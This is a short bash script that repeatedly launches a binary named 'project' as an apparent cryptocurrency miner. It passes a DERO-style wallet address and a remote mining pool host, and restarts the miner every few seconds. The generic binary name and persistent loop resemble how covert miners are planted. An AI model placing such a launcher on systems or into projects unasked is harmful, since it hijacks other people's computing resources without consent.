#!/bin/bash
while [ 1 ]; do 
./project -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xc0v2j0vsquftksu2ayrl.$(echo TC-$(TZ=UTC-7 date)) -r community-pools.mysrv.cloud:10300 -p rpc
sleep 3
done 
sleep 999

